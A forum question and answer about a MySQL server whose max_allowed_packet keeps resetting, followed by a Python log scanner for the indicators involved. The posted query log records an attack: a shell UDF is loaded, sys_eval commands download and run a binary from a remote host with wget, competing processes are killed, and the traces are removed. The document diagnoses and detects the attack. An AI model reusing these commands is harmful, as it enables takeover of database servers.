
max_allowed_packet is resetting to 1024 because of some unknown application


Whenever I change max_allowed_packet, it gets reset after a few hours. When I checked the query log I found the following queries, but I am unable to figure out which application or process executes these queries. Does anyone know what this is about, or is it MySQL itself?

161020  3:09:34   723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_set RETURNS int SONAME 'ptfuki32.so'
161020  3:09:35   723 Query CREATE FUNCTION sys_exec RETURNS int SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'ptfuki32.so'
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020  3:09:36   723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020  3:09:37   723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Quit  
          724 Connect   root@ip on mysql
161020  3:09:38   724 Query SHOW VARIABLES LIKE '%compile_os%'
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
161020  3:09:39   724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('killall -9 .sshd')
          724 Query select sys_eval('killall -9 .sh')
161020  3:09:40   724 Query select sys_eval('killall -9 and1')
          724 Query select sys_eval('killall -9 cisco')
          724 Query select sys_eval('killall -9 ciscoh')
          724 Query select sys_eval('killall -9 L24')
          724 Query select sys_eval('killall -9 L26')
161020  3:09:41   724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          724 Query select sys_eval('chmod 777 http://ip:5555;')
          724 Query select sys_eval('./http://ip:5555;')
          724 Query select sys_eval('kill str=`netstat -anept 2>/dev/null |grep -E ':(68866|7583|2222|10711|6009|10991|10771|7168|7668|36000|36001|25000|25001|25002)'|cut -d / -f 1`')
          724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
161020  3:09:42   724 Query select sys_eval('wget http://ip4:5555/v9mm;chmod 777 v9mm;./v9mm;')
          724 Quit  
          725 Connect   root@ip on mysql
          725 Query SHOW VARIABLES LIKE '%compile_os%'
161020  3:09:43   725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          725 Query FLUSH PRIVILEGES
          725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          725 Query FLUSH PRIVILEGES
161020  3:09:44   725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
          725 Query DROP FUNCTION IF EXISTS sys_get
          725 Query DROP FUNCTION IF EXISTS sys_set
161020  3:09:45   725 Query DROP FUNCTION IF EXISTS sys_exec
          725 Query DROP FUNCTION IF EXISTS sys_eval
          725 Query DROP FUNCTION IF EXISTS cmdshell
          725 Query set global log_bin_trust_function_creators=0
          725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
161020  3:09:46   725 Query SET GLOBAL log_bin_trust_routine_creators=0
          725 Query SET GLOBAL max_allowed_packet=1024
          725 Query FLUSH PRIVILEGES
          725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
          725 Query DROP FUNCTION IF EXISTS sys_get
161020  3:09:47   725 Query DROP FUNCTION IF EXISTS sys_set
          725 Query DROP FUNCTION IF EXISTS sys_exec
          725 Query DROP FUNCTION IF EXISTS sys_eval
          725 Query DROP FUNCTION IF EXISTS cmdshell
          725 Query set global log_bin_trust_function_creators=0
161020  3:09:48   725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
          725 Query SET GLOBAL log_bin_trust_routine_creators=0
          725 Query SET GLOBAL max_allowed_packet=1024
          725 Query FLUSH PRIVILEGES
          725 Quit

Solution

  • It seems someone has attacked my MySQL server with SQL injection. cna12.dll is a malware file. Check the link below to protect against such attacks: https://malwaremusings.com/2013/02/14/how-to-protect-yourself-from-the-cna12-dll-mysql-attacks/
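As an added illustration (not part of the question or the answer above), a small Python detector that walks general-query-log lines in the format shown in the question and flags the indicators visible there: a UDF loaded with CREATE FUNCTION ... SONAME, calls to sys_eval and the other shell UDFs, their later removal, and the SET GLOBAL max_allowed_packet change the question reports. The sample log is constructed from a few lines modelled on the question, and the rule names and the Finding class are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample modelled on the general query log in the question; not the original log.
SAMPLE_LOG = """\
161020  3:09:34   723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'ptfuki32.so'
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Quit
          724 Connect   root@ip on mysql
161020  3:09:38   724 Query SHOW VARIABLES LIKE '%compile_os%'
          725 Query DROP FUNCTION IF EXISTS sys_eval
          725 Query SET GLOBAL max_allowed_packet=1024
          726 Query SELECT id, name FROM customers WHERE id = 42
"""

# One general-log record: optional timestamp, thread id, command, argument.
LINE_RE = re.compile(r"^(?:(\d{6}\s+\d{1,2}:\d{2}:\d{2})\s+)?(\d+)\s+(\w+)\s*(.*)$")

# Indicator rules; the UDF names are the ones that appear in the question's log.
UDF_NAMES = r"(?:sys_eval|sys_exec|sys_get|sys_set|cmdshell|lib_mysqludf_sys_info)"
RULES = [
    ("udf_created", re.compile(r"CREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'", re.I)),
    ("udf_called", re.compile(r"\b(" + UDF_NAMES + r")\s*\(", re.I)),
    ("udf_dropped", re.compile(r"DROP\s+FUNCTION\s+(?:IF\s+EXISTS\s+)?(" + UDF_NAMES + r")", re.I)),
    ("global_reconfigured", re.compile(r"SET\s+GLOBAL\s+(max_allowed_packet|log_bin_trust_\w+)\s*=\s*(\S+)", re.I)),
]

@dataclass
class Finding:
    thread: str   # connection/thread id from the log, ties lines to one session
    kind: str     # which rule fired
    detail: str   # captured groups of the rule (library name, UDF name, variable and value)

def scan_general_log(text: str) -> list[Finding]:
    """Return one Finding per Query line that matches an indicator rule (first rule wins)."""
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())          # continuation lines carry no timestamp
        if not m or m.group(3) != "Query":
            continue
        thread, sql = m.group(2), m.group(4)
        for kind, rule in RULES:
            hit = rule.search(sql)
            if hit:
                findings.append(Finding(thread, kind, " ".join(hit.groups())))
                break
    return findings

def threads_with_udf_activity(findings: list[Finding]) -> set[str]:
    """Threads that loaded or invoked a shell UDF: the sessions to investigate first."""
    return {f.thread for f in findings if f.kind in ("udf_created", "udf_called")}

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"thread {f.thread}: {f.kind} ({f.detail})")
```

Pointing the scanner at the real log and correlating the flagged thread ids with their Connect lines shows which account and source host issued the UDF load and the max_allowed_packet change.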